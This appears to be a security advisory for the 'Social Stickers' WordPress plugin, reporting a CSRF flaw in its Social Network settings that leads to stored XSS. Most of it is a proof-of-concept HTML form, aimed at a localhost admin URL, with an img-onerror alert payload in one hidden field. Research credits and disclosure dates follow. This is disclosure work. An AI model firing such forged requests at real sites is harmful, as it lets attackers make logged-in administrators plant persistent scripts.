The plugin does not have CSRF checks in place when updating its Social Network settings, and does not escape some of these fields, which could allow attackers to make a logged-in admin change them and lead to Stored Cross-Site Scripting issues.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/wordpress/wp-admin/options-general.php?page=social- stickers%2Fsocial-stickers.php&tab=social_networks" method="POST"> <input type="hidden" name="aim" value="" /> <input type="hidden" name="behance" value="hello "><img src=x onerror=alert(9 )>" /> <input type="hidden" name="bebo" value="" /> <input type="hidden" name="blogger" value="" /> <input type="hidden" name="delicious" value="" /> <input type="hidden" name="designfloat" value="" /> <input type="hidden" name="deviantart" value="" /> <input type="hidden" name="digg" value="" /> <input type="hidden" name="email" value="" /> <input type="hidden" name="flickr" value="" /> <input type="hidden" name="facebook" value="" /> <input type="hidden" name="googleplus" value="" /> <input type="hidden" name="lastfm" value="" /> <input type="hidden" name="linkedin" value="" /> <input type="hidden" name="myspace" value="" /> <input type="hidden" name="newsvine" value="" /> <input type="hidden" name="picasa" value="" /> <input type="hidden" name="posterous" value="" /> <input type="hidden" name="rss" value="" /> <input type="hidden" name="qik" value="" /> <input type="hidden" name="slashdot" value="" /> <input type="hidden" name="skype" value="" /> <input type="hidden" name="stumbleupon" value="" /> <input type="hidden" name="tumblr" value="" /> <input type="hidden" name="twitter" value="" /> <input type="hidden" name="vimeo" value="" /> <input type="hidden" name="youtube" value="" /> <input type="hidden" name="wordpress" value="" /> <input type="hidden" name="Submit" value="Update usernames" /> <input type="hidden" name="social-stickers-settings-submit" value="Y" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Vinay Varma Mudunuri, Krishna Harsha Kondaveeti
Vinay Varma Mudunuri
Yes
2022-04-20 (about 2 months ago)
2022-04-20 (about 2 months ago)
2022-04-21 (about 2 months ago)